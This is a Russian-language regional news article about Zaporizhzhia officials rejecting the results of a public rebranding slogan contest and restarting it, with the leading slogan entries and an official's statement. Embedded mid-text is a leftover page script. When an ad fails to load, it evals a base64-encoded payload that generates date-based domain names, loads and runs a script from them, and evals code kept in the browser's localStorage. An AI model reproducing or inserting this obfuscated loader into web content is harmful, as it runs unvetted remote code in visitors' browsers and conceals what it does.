Не так давно в Запорожской облгосадминистрации запустили конкурс для жителей области, чтобы выбрать подходящий слоган. Все это являлось частью ребрендинга.
Конкурс закончился, однако результаты и варианты голосования по поводу слоганов чиновников и разработчиков бренда не устроили. По мнению экспертов, не один из предложенных вариантов не отражает в полной мере туристическую привлекательность области, поэтому не может претендовать на победу.
Всего с 6 по 16 октября на конкурс слоганов было отправлено 94 предложения, некоторые из них повторялись. Наибольшую поддержку получили следующие варианты:
Запоріжжя – у серці назавжди (9 схвалень);Запоріжжя – величність минулого, історія майбутнього! (5 схвалень);Залізне серце України (4 схвалення);Край з характером! Побачимось? (4 схвалення);Тут починалась Україна (4 схвалення);Море і Січ – подих сторіч (4 схвалення);Запорізький край – туристичний рай (4 схвалення).
Теперь конкурс будет проведен заново. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }
Также в ЗОГА отметили, что ребрендинг области проходит не за бюджетные средства, а считается социальным проектом. Что касается логотипа области, три варианта которого выставили на всеобщее голосование жителей, то чиновники заверяют, что цвета и варианты были подобраны по результатам опроса.
Булава, щит или компас: Запорожцам предлагают проголосовать за логотип области (ФОТО)
По результатам опроса, в тройку лидеров попали зеленый — 51%, желтый — 42% и голубой — 33%. В этом опросе приняли участие более 3 тысяч респондентов. Никаких оснований считать результаты социологического опроса некорректными, у нас нет. Я напомню, что основная цель этого проекту — повысить туристическую привлекательность Запорожской области и вместе создать такой символ, который бы отделял Запорожскую область среди других регионов. Поэтому объявляется рестарт конкурса. Конкурс продлен и предлагается присоединиться к участию всем желающим. Давайте продолжим эту работу вместе, — заявил замглавы ОГА Александр Свистун. (adsbygoogle = window.adsbygoogle || []).push({});
Подписывайтесь на Акцент в Источник: https://akzent.zp.ua/v-zaporozhskoj-oga-ne-dovolny-variantami-slogana-oblasti-ot-zhitelej-konkurs-perezapustili/
Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook